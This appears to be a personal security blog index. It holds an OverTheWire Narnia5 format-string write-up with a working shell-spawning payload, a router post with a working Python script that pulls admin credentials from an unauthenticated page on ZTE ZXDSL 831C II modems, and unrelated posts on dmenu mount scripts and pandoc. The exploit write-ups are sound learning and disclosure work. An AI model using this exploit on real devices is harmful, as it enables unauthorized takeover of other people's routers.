$ vesl.et

# Index of Logs

"The shortest pencil is longer than the longest memory."

2021

  • Hero

    ## Narnia 5 - OverTheWire

    ### Introduction

    This level introduces format string vulnerabilities. A program is said to have a format string vulnerability if it passes unsanitized user input to one of the printf family of functions. These are as follows:

    ```c
    #include <stdio.h>

    int printf(const char *format, ...);
    int fprintf(FILE *stream, const char *format, ...);
    int dprintf(int fd, const char *format, ...);
    int sprintf(char *str, const char *format, ...);
    int snprintf(char *str, size_t size, const char *format, ...);

    #include <stdarg.h>

    int vprintf(const char *format, va_list ap);
    int vfprintf(FILE *stream, const char *format, va_list ap);
    int vdprintf(int fd, const char *format, va_list ap);
    int vsprintf(char *str, const char *format, va_list ap);
    int vsnprintf(char *str, size_t size, const char *format, va_list ap);
    ```

    More precisely, the vulnerability exists when the user input is given directly to one of these functions as the format parameter. Here is an example:

    ```c
    #include <stdio.h>
    #include <string.h>

    int main(int argc, char *argv[])
    {
        char input[10];

        if (argc != 2) {
            printf("Usage: %s <input>\n", argv[0]);
            return -1;
        }
        strncpy(input, argv[1], sizeof input);
        input[sizeof input - 1] = 0;   /* strncpy leaves no terminator when the input fills the buffer */
        printf(input);                 /* user input used as the format string */
        return 0;
    }
    ```

    This code may look secure, but it is not. The vulnerability lies in how we call printf. Instead of printf(input) it should have been called as printf("%s", input). This is because of how printf works. The printf family of functions uses placeholders, called format specifiers, for the different data types. We have already used one of them, %s, which tells printf to expect a string. There is one for every kind of data type; here are some examples:

    - %s: a string
    - %d: an integer
    - %f: a float
    - %u: an unsigned integer
    - %p: a pointer
    - %x: print the value in hex

    When printf encounters one of these format specifiers it assumes that a corresponding argument was passed after the format string. So it takes whatever it finds in memory at that position and tries to make sense of it. You can test this with the previous program by giving it a bunch of %x; the program will print a bunch of numbers:

    ```
    $ ./a.out "%x %x %x"
    94a04550 0 25207825
    ```

    These are not random values; they are the hex representation of what the program found on the stack. Take a closer look at 25207825: it looks odd because every byte is in the ASCII range. Its bytes 25 20 78 25 are the characters "% x%", and because the machine is little endian they are reversed, so in memory this is "%x %", the start of our own input. This means that, in our case, the 3rd format parameter is reading from our input string. This can be used to read and write arbitrary memory; more on this later.

    ### Examining Narnia5

    The source code for Narnia5 is as follows:

    ```c
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    int main(int argc, char *argv[])
    {
        int i = 1;
        char buffer[64];

        snprintf(buffer, sizeof buffer, argv[1]);
        buffer[sizeof (buffer) - 1] = 0;
        printf("Change i's value from 1 -> 500. ");

        if (i == 500) {
            printf("GOOD\n");
            setreuid(geteuid(), geteuid());
            system("/bin/sh");
        }

        printf("No way...let me give you a hint!\n");
        printf("buffer : [%s] (%d)\n", buffer, strlen(buffer));
        printf("i = %d (%p)\n", i, &i);
        return 0;
    }
    ```

    This program gives us a shell if it finds the value of i to be 500, but there is no obvious way to set i to 500. If you look closely, one of the printf family of functions is being used: snprintf. The signature of this function is as follows:

    ```c
    int snprintf(char *str, size_t size, const char *format, ...);
    ```

    This means the user input, argv[1], is given directly as the format string. We can test this by giving the program a bunch of %x and observing the output. I also put some AAAA in front to see which format parameter reads from our input string:

    ```
    $ ./narnia5 "AAAA%x %x %x %x %x"
    Change i's value from 1 -> 500. No way...let me give you a hint!
    buffer : [AAAA41414141 31343134 31343134 33313320 33313334] (48)
    i = 1 (0xffffd6d0)
    ```

    From the output we can see that the 1st format parameter already reads from our input string, hence the 41s, which are the hex representation of A. If we were to put %s instead of %x, the program would crash: %s expects a pointer, and when it tries to dereference 41414141 it finds nothing mapped at that address.

    ```
    $ ./narnia5 "AAAA%s"
    Segmentation fault
    ```

    With format strings we can also specify padding. Let's say we have the number 1234 and we want to print it in a field 10 characters wide, i.e. "      1234". The first 4 characters are taken by the number itself and the remaining 6 are used as padding, which means that if the number became 12345 the printed value would be "     12345", with only 5 spaces. You achieve this by adding a number between the % sign and the letter that specifies the type of the format parameter, for example %10x.

    Now, where do we go with this? In addition to the format parameters discussed so far there is another one, %n. While the other format parameters read, this one writes: %n stores the number of characters printed so far into the int variable whose address is passed as the corresponding argument. Let's see this with an example:

    ```c
    #include <stdio.h>

    int main()
    {
        int i = 0;
        printf("Hello World!!!%n\n", &i);
        printf("i: %d\n", i);
        return 0;
    }
    ```

    The output:

    ```
    $ ./a.out
    Hello World!!!
    i: 14
    ```

    ### Exploiting

    Combining all this we can set the value of i to 500 and get a shell. Every time the program is run it prints the address of i, so we can just use that. Oh, and don't forget about little endian: in our case the address of i was 0xffffd6d0, which in little endian byte order is \xd0\xd6\xff\xff. I've added the \x so that python understands these are hex values. The 4 bytes of AAAA plus the 4 address bytes plus 492 characters of padding make exactly 500 characters printed before %n is reached.

    ```
    $ ./narnia5 "$(python -c 'print "AAAA\xd0\xd6\xff\xff%492x%n"')"
    Change i's value from 1 -> 500. GOOD
    $ cat /etc/narnia_pass/narnia6
    neezocaeng
    ```

    That's it, thank you for reading.
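The following C program is an added example, not code from the Narnia5 write-up: it shows what %n records once padding is applied, using the write-up's own numbers, and the fixed snprintf call under which the same input is copied as plain data. The "BBBB" filler standing in for the 4 address bytes is a constructed assumption, and the %n target is a local int.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not code from the write-up. Compile with
 *   cc -Wall -Wformat=2 -Werror=format-security example.c
 * With those flags a non-literal format such as snprintf(buf, n, user)
 * is rejected at compile time, which is the cheapest way to catch the
 * Narnia5 pattern in your own code. */

/* Count that %n records for "AAAA" + 4 filler bytes + "%<pad>x%n".
 * "BBBB" stands in for the 4 address bytes of the write-up's payload
 * (constructed filler, not a real address); %n writes into a local. */
int written_before_n(int pad)
{
    char out[1024];
    int count = -1;

    /* %*x takes the field width from an argument; 0 is the value padded. */
    snprintf(out, sizeof out, "AAAABBBB%*x%n", pad, 0u, &count);
    return count;              /* 8 + pad for pad >= 1, e.g. 500 for 492 */
}

/* The fix for the Narnia5 pattern: user input is passed as a %s argument,
 * never as the format. Returns 1 when the buffer holds the input verbatim,
 * i.e. any %x or %n in it was treated as ordinary characters. */
int safe_copy_keeps_input_literal(const char *user)
{
    char buffer[64];

    /* was: snprintf(buffer, sizeof buffer, argv[1]); */
    snprintf(buffer, sizeof buffer, "%s", user);
    buffer[sizeof buffer - 1] = 0;
    return strncmp(buffer, user, sizeof buffer - 1) == 0;
}

int main(void)
{
    const char *probe = "AAAA%492x%n";   /* constructed sample input */

    printf("%%n after 492 padding: %d\n", written_before_n(492));
    printf("input kept literal under \"%%s\": %s\n",
           safe_copy_keeps_input_literal(probe) ? "yes" : "no");
    return 0;
}
```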

    #narnia5#overthewire#format_strings#binary exploitation
  • Hero

    [Overthewire](https://www.overthewire.org) is a really good resource for someone new to cybersecurity to learn about it. It has a hands-on approach to teaching. It has what I call Seasons. These so-called Seasons are not actually numbered but named, and each season has episodes. At least that's how I imagine it in my head.

    ![overthewire homepage](./Pictures/screenshotFeb0910:51:32AM.png)

    Each season teaches a different cybersecurity concept. For example season 1 (Bandit) teaches about the Linux operating system. And the way they do it is awesome: you don't even have to install any kind of Linux on your system or use a virtual machine. They have already set up a remote server for you; you just have to log in using ssh and you're good to go.

    As my eagerness to learn hacking was starting to grow, I had no idea where to go or where to start. Hacking was, and still is, considered a very bad thing in my society, so this might also have had its own effects. I was always watching YouTube videos and reading about how to hack Facebook or Gmail, and these were a big deal at that time. But after a while they became redundant: I had no new knowledge to acquire from them and it started to get boring. While doing these for a while I heard the term script kiddie being used a lot. By investigating this term further I realized I was a script kiddie, so my next journey was to become a real hacker, not a script kiddie. I even had Kali Linux installed on a flash drive with persistence and would flex on some of my friends. I also installed Kali Linux on my main and only laptop; it was not long after that I realized it was a bad idea, so I removed Kali, installed Ubuntu and distro-hopped a lot, but that's a story for another time.

    After I googled "how not to be a script kiddie", every blog post I read was telling me to learn a programming language, and everyone was recommending Python, so I started to learn Python. The main resources I used at that time were the website [codecademy.com](https://www.codecademy.com) and "Learn Python the Hard Way" by Zed A. Shaw. I didn't stop there; it was around this time that I had to go to college. I decided I was going to study Software Engineering because I loved computers, duh. In my first and second year of college I acquired knowledge of many languages like PHP, JavaScript, Java, C, C++ and so on. But I was nowhere near becoming a hacker (spoiler alert: I'm still nowhere near becoming one).

    While all this was happening I had a book I had set aside and procrastinated a lot about reading. One day I was sitting in my dorm, really bored, looking around my filesystem, and I stumbled upon this book I had been setting aside for a long time. The book goes by the title "Hacking: The Art of Exploitation, 2nd Edition" by Jon Erickson. I cannot tell you how much I loved it. This book opened a whole new world of hacking to me; I was fascinated. By reading this book, seeking more knowledge about the terms and techniques, and wanting to know more, I had to dig around the Internet, and oh boy, I was bookmarking site after site and book after book. That's how I stumbled upon OverTheWire too.

    I think this post is getting too long, so I will stop here and share with you all the resources like YouTube channels, websites and blogs that you can go to to learn hacking. This list will grow as I obtain more resources.

    Books:

    - Serious Cryptography: A Practical Introduction to Modern Encryption by Jean-Philippe Aumasson
    - The Art of Software Security Assessment
    - Practical Malware Analysis

    Links:

    - [pwnable.kr](https://www.pwnable.kr)
    - [pwnable.tw](https://www.pwnable.tw)
    - [cryptopals.com](https://www.cryptopals.com)
    - [w3challs.com](https://www.w3challs.com)
    - [vk.com](https://www.vk.com)
    - [root.me](https://www.root.me)
    - blind rop x64

    #ctf#overthewire#hacking
  • Hero

    ## Mounting and unmounting with dmenu

    Mounting devices with the mount command is a hassle, at least for me. To mount devices with the mount command you need to be root, but if you use any kind of file manager to mount devices you don't need to be root. Have you ever wondered why that is? Well, it's simple: they use a different command, called udisksctl. Here is its help.

    ### Commands used

    #### udisksctl

    ![udisksctl](./Pictures/screenshotJan1504:43:30PM.png)

    udisksctl has a lot of commands. We will be using the mount and unmount commands. Here is the help.

    ![help udisksctl](./Pictures/screenshotJan1504:47:10PM.png)

    #### lsblk

    What the lsblk command does is very simple: it lists block devices and information related to those devices. Some of the information it displays is the mountpoint, label, name, type, and so on. Here is an example.

    ![lsblk](./Pictures/screenshotJan1508:39:38PM.png)

    #### awk

    Awk is a programming language, and a whole new world of knowledge. I really recommend you take your time and learn it. That doesn't mean I'm anywhere near perfect in awk, but I think I have some basic knowledge. We will use awk to filter the output of commands and select certain columns of the output.

    #### cut

    cut can be used to select and/or remove some section of a line. It will be used here to parse the output of awk. Why, you might ask, don't I just use awk to do that too? The answer, as always, is because I'm an idiot and couldn't find any better way.

    #### dmenu

    dmenu is not a command, it's sort of an app. What it does is basically simple: you give, or rather pipe, a bunch of newline-separated data to it, it prompts you to choose one of them, and once you select one it prints it, the option you chose, to standard output. For example:

    ```bash
    echo -e "choice 1\nchoice 2\nchoice 3" | dmenu
    ```

    ![dmenu](./Pictures/a.png)

    ### Mounting

    Let's put these commands together to build a mounting script. First I'm gonna put the script here and explain it afterwards.

    ```bash
    #!/bin/sh
    # list unmounted partitions and disks, let the user pick one, mount it
    mount=$(lsblk -l -o NAME,LABEL,TYPE,MOUNTPOINT \
        | awk '/(part|disk) *$/ {print $1 ": " $2}' \
        | dmenu -i -p "mount: " \
        | cut -d ':' -f 1)
    [ -n "$mount" ] && notify-send "$(udisksctl mount -b "/dev/$mount")"
    ```

    The first line tells whoever is going to run this script to use /bin/sh to run it. The mount= part is simply assigning a variable. The $() means to replace it with whatever is returned or printed by what is inside the parentheses; the alternative way is using backticks. The lsblk command, with its options, prints the name, label, type and mountpoint. We will use the name to differentiate the partitions, the label to get their name, and the mountpoint to know whether they need to be mounted or not.

    ![lsblk with options](./Pictures/screenshotJan1509:19:06PM.png)

    The awk '/(part|disk) *$/ {print $1 ": " $2}' takes the output of lsblk and keeps only the partitions and disks whose line ends right after the type column, i.e. those whose mountpoint is empty and which are therefore not mounted, and "prints" them with their "label". (If a partition has no label, $2 is its type column instead.)

    ![lsblk with awk](./Pictures/screenshotJan1509:23:15PM.png)

    Now pipe this to dmenu and you get your list of unmounted drives.

    ![lsblk, awk, and dmenu](./Pictures/b.png)

    The last part, i.e. cut -d ':' -f 1, gets rid of the label and preserves the name of the drive. On the next line we check if the user chose anything; if so we mount it and notify that it has been mounted.

    ### Unmounting

    The unmount script does the same thing, but in reverse, i.e. it uses the unmount command of udisksctl.

    ```bash
    #!/bin/sh
    # list mounted partitions and disks (except the internal nvme drive), pick one, unmount it
    unmount=$(lsblk -l -o NAME,LABEL,TYPE,MOUNTPOINT \
        | awk '/(part|disk) +\/.*$/ && !/nvme/ {print $1 ": " $2}' \
        | dmenu -i -p "unmount: " \
        | cut -d ':' -f 1)
    [ -n "$unmount" ] && notify-send "$(udisksctl unmount -f --no-user-interaction -b "/dev/$unmount")"
    ```

    There is a bit of a difference in the awk command, though. Here I'm using something different to filter the output of lsblk: '/(part|disk) +\/.*$/ && !/nvme/'. If you look closely, these are two regexps connected by an and (&&) operator, which means whatever comes through awk must satisfy both of them. The first part, /(part|disk) +\/.*$/, looks for mounted drives (the type column followed by a mountpoint starting with /), and the second part, !/nvme/, filters out my main internal drive. And that's it folks, we have done it.

    #linux#dmeu#udiskctl
  • Hero

    ## How I Hacked My First Router

    I have never found a real vulnerability in the "real world" before. I was just playing CTFs and wargames. One day I was looking through our old stuff and I stumbled upon this router, the ZTE ZXDSL 831C II, and I had heard before that this router has a vulnerability. So I thought this would be the perfect chance. I set it up and started pwning.

    ### Scanning with Nmap

    Once a hacker is on a network, it's obvious what they do: they always run nmap. Let's run an nmap scan on the router and save the result to a file. We will perform a service scan and also run the default scripts. We use sudo to make nmap go faster.

    ```bash
    sudo nmap -sC -sV -oA router.txt 192.168.1.1
    ```

    While we check the result it's a good idea to run another scan of all ports.

    ```bash
    sudo nmap -sC -sV -p- -oA routerallports.txt 192.168.1.1
    ```

    Let's inspect the output of the first command.

    ### Results

    The result of the first nmap scan looks like this.

    {{< figure src="./pic/2021-01-0419-55.png" title="Nmap Scan" >}}

    #### Port 80

    In the scan we can see that there are some ports open. Let's inspect port 80 first.

    {{< figure src="./pic/2021-01-0420-03.png" title="Login Page" >}}

    It appears to be a web interface. The default username and password is admin; put that in and you will get this. At this point my target shifted to being able to obtain the source code of this web application.

    {{< figure src="./pic/2021-01-0420-05.png" title="Web Interface" >}}

    We will use the management tab, which changes the username and password, to demonstrate the attack.

    {{< figure src="./pic/2021-01-0420-06.png" title="" >}}

    #### Port 23

    If we go back to our nmap scan we see that port 23 is open, which is telnet, and it uses the same username and password as the web application. We can use the following command to log in.

    ```bash
    telnet 192.168.1.1 23
    ```

    {{< figure src="./pic/2021-01-0420-08.png" title="telnet" >}}

    After logging in you can issue some commands to manage the router, and if you type in help you will get a list of the commands you can use. I was interested in the sh command, which gives you a Linux shell. After getting a shell I immediately ran the ls command to see what's there.

    {{< figure src="./pic/2021-01-0420-10.png" title="ls" >}}

    This is a listing of the root directory. The directory I was particularly interested in was the webs directory. I went into the webs directory and searched for any file which contains the word passwd in its name, and I found two.

    {{< figure src="./pic/2021-01-0420-11.png" title="passwd" >}}

    You can cat the contents of any file in this directory.

    ### Finding The Vulnerability

    I was interested in the contents of adminpasswd.html. Here is the source code.

    ```html
    <html>
    <head>
    <meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    <link rel="stylesheet" href='stylemain.css' type='text/css'>
    <link rel="stylesheet" href='colors.css' type='text/css'>
    <script language="javascript" src="util.js"></script>
    <script language="javascript" >
    <!-- hide
    nameAdmin = '<%ejGet(sysUserName)%>';
    pwdAdmin = '<%ejGet(sysPassword)%>';

    function frmLoad() {
       with ( document.forms[0] ) {
          sysUserName.value = nameAdmin;
          sysPassword.value = pwdAdmin;
          cfmPwd.value = pwdAdmin;
       }
    }

    function btnApplyAdmin() {
       var loc = 'adminpasswd.cgi?action=save&';
       with ( document.forms[0] ) {
          if(sysUserName.value == '<%ejGet(usrUserName)%>') {
             alert("Don't make such names!Please change it!\n ");
             return;
          }
          if ( isIncludeInvalidChar(sysUserName.value) ) {
             alert('Invalide characters in user name.');
             return;
          }
          if ( isIncludeInvalidChar(sysPassword.value) ) {
             alert('Invalide characters in password.');
             return;
          }
          if ( sysUserName.value.length == 0 ) {
             alert('Admin Account and Password can\'t be empty.');
             return;
          }
          if ( sysUserName.value.indexOf(' ') != -1 ) {
             alert('Admin Accout can\'t contain a space.');
             return;
          }
          if ( sysPassword.value.indexOf(' ') != -1 ) {
             alert('Password can\'t contain a space.');
             return;
          }
          if ( sysUserName.value.length > 15 ) {
             alert( 'Admin Account should not be longer the 15 characters!' );
             return;
          }
          if ( sysPassword.value.length > 32 ) {
             alert ('Password should not be longer than 32 characters.');
             return;
          }
          if ( sysPassword.value != cfmPwd.value ) {
             alert("The passwords do not match.");
             return;
          }
          if ( sysPassword.value.length == 0 ) {
             alert('Admin Accout and Password cannot be empty.');
             return;
          }
          loc += 'sysUserName=' + encodeUrl(sysUserName.value) + '&';
          loc += 'sysPassword=' + encryptPassword(encodeUrl(sysPassword.value)); //lvwz
          var code = 'location.assign("' + loc + '")';
          eval(code);
       }
    }
    -->
    </script>
    </head>
    <body onLoad='frmLoad()'>
    <form>
    <strong>Admin Account</strong>
    <BR>
    <BR>
    <TABLE cellSpacing="0" cellPadding="0" border="0">
    <TBODY>
    <TR>
    <TD width="590">Admin account has unrestricted access to change and view configuration of your ADSL<br> router. </TD>
    </TR>
    </TBODY>
    </TABLE>
    <BR>
    <TABLE cellSpacing="0" cellPadding="0" border="0">
    <TBODY>
    <TR height="30">
    <TD width="150">User Name:</TD>
    <TD><INPUT maxLength="63" size="30" name="sysUserName"></TD>
    </TR>
    <TR height="30">
    <TD>New Password:</TD>
    <TD><INPUT type="password" maxLength="32" size="30" name="sysPassword"></TD>
    </TR>
    <TR height="30">
    <TD>Confirm New Password:</TD>
    <TD><INPUT type="password" maxLength="32" size="30" name="cfmPwd"></TD>
    </TR>
    </TBODY>
    </TABLE>
    <BR>
    <TABLE width="500" border="0">
    <TBODY>
    <TR>
    <TD align="left" width="494"><INPUT name="button" type="button" onClick="btnApplyAdmin()" value="Apply"> </TD>
    </TR>
    </TBODY>
    </TABLE>
    </form>
    </body>
    </html>
    ```

    This is the page the router uses to change the username and password for accessing the router, the one I showed you earlier. You might ask, "couldn't you just inspect the elements while you were authenticated and get the source code?". That would be a valid question, and my answer would be "because I'm an idiot, and I prefer doing stuff the hard way". Anyway, if you try to access this page without creds, you get access denied.

    Take note here, though: near the top of the script the page stores two variables, nameAdmin and pwdAdmin, which are populated by the cgi script, judging by the <%ejGet(sysUserName)%> and <%ejGet(sysPassword)%> tags. In btnApplyAdmin() you can see where this page submits the creds to: adminpasswd.cgi. After searching a lot for the source code of this cgi script I couldn't find it anywhere, and I was avoiding googling for it because I was afraid of spoilers. Finally I decided to visit the cgi script directly. I was shocked. I thought maybe the cookies from my earlier authentication might have had an effect, so I opened a new browser (qutebrowser), tried again, and boom: no need to authenticate to access this page.

    {{< figure src="./pic/2021-01-0520-10.png" title="Accessing the cgi script" >}}

    We can change the username and password and access the page. Boom, hacked. But wait, there is more. If you're curious enough you wouldn't stop there, you would dig for more. So let's dig some more. Obviously any site asks for the old password to check that you are who you say you are. This page does that checking on the client side, in the open, which means you can just snatch the username and password from the page source.

    {{< figure src="./pic/2021-01-0520-12.png" title="Inspecting the page" >}}

    I wrote a script to do just that.

    ```python
    #!/usr/bin/env python
    """
    This script extracts the Username and Password of the ZTE - ZXDSL 831C II modem.
    This script can only be used on a system you have the authority to execute such
    scripts on. If you did this attack on a system you don't have authority on I'm
    not held responsible. Do so on your own risk.

    author: Omer Abdulaziz
    email: omerabdi@pm.me
    """
    import re
    import sys

    import requests

    host = "192.168.1.1"
    try:
        host = sys.argv[1]
    except IndexError:
        pass

    try:
        print(f"[*] Attacking {host} ...")
        response = requests.get(f"http://{host}/adminpasswd.cgi")
    except requests.RequestException:
        print("[!] Network error")
        sys.exit(2)

    if response.status_code == 200:
        # the page embeds the current credentials in two JavaScript variables
        name_match = re.search("nameAdmin = '.*'", response.text)
        pwd_match = re.search("pwdAdmin = '.*'", response.text)
        if name_match is None or pwd_match is None:
            print("[!] It appears the target is not vulnerable")
            sys.exit(1)
        userna = name_match.group().split("'")[1]
        passwd = pwd_match.group().split("'")[1]
        print(f"[=] Username: {userna}")
        print(f"[=] Password: {passwd}")
        sys.exit()
    else:
        print("[!] It appears the target is not vulnerable")
        sys.exit(1)
    ```

    Running the script. The script runs against the 192.168.1.1 target by default, but you can change that by supplying the target of your choice.

    ```bash
    python exp.py
    ```

    or give it any other target:

    ```bash
    python exp.py 10.0.0.1
    ```

    {{< figure src="./pic/2021-01-0420-18.png" title="Running the exploit" >}}

    Inspired by malwaretech's "[How I Found My First Ever ZeroDay (in RDP)](https://www.malwaretech.com/2020/12/how-i-found-my-first-ever-zeroday-in-rdp.html)" post.

    #hacking#router#ZTE#exploit
  • Hero
    Pandoc 01-01

    ## Pandoc

    Have you ever wanted to write a document, but you hate using applications like Microsoft Office, LibreOffice, Google Docs, or anything of the sort? Do you want to write your documents just like you write code, with your code editor's perks? I, for example, use vim and would have loved it if these applications supported vim bindings. Well, look no further: you can just use pandoc. Pandoc is a command-line app which can convert a document of almost any type to any other type. Basically you use your text editor of choice to write your document in a markup language like Markdown, and then use pandoc to convert it to any format you want, be it pdf or docx. In our case we will be using Markdown to write a document.

    ### Installing pandoc

    Pandoc can be installed on Arch based systems like this:

    ```bash
    sudo pacman -S pandoc
    ```

    In order to convert documents to pdf, pandoc uses what is called a pdf engine. The available pdf engines are:

    - pdflatex
    - lualatex
    - xelatex
    - tectonic
    - wkhtmltopdf
    - weasyprint
    - prince
    - context
    - pdfroff

    By default pandoc uses the pdflatex engine, but you can download and use whichever one you want. To specify your desired engine you use the --pdf-engine option, as we will see in a bit. If you are a beginner I recommend the wkhtmltopdf engine, which can be installed like so:

    ```bash
    sudo pacman -S wkhtmltopdf
    ```

    ### Markdown

    Markdown is a lightweight markup language like HTML, but much simpler. Here is an example.

    ```markdown
    # Section 1

    This is a paragraph.

    ## Sub Section

    This is another paragraph.

    **This is bold text**
    *This is italics*
    ***Bold and italics***
    ~~Strike Through~~
    `code with no syntax highlight`

    Here is an image

    ![Pic](./Pictures/pic1.png)

    To insert a link all you have to do is [DuckDuckGo](https://www.duckduckgo.com)

    Here is a list

    - List item 1
    - List item 2
    - List item 3

    Here is a numbered list

    1. List item one
    2. List item two
    3. List item three
    ```

    In Markdown the # is treated as a heading. Basically, if you have one #, it is a first level heading, and if you have two it's a second level heading; you get the idea. I will leave some links down below if you want to know more about Markdown.

    ### Converting The Documents

    To convert what you have written in Markdown, save it with a .md extension, for example notes.md, and issue the following command:

    ```bash
    pandoc notes.md -o doc.pdf
    ```

    Or, if you want to specify a particular pdf engine:

    ```bash
    pandoc notes.md -o doc.pdf --pdf-engine=wkhtmltopdf
    ```

    Here is a sample pdf file I converted from a note I took about runit: [runitshortnote.pdf](./runitshortnote.pdf)

    #document#linux#pandoc#markdown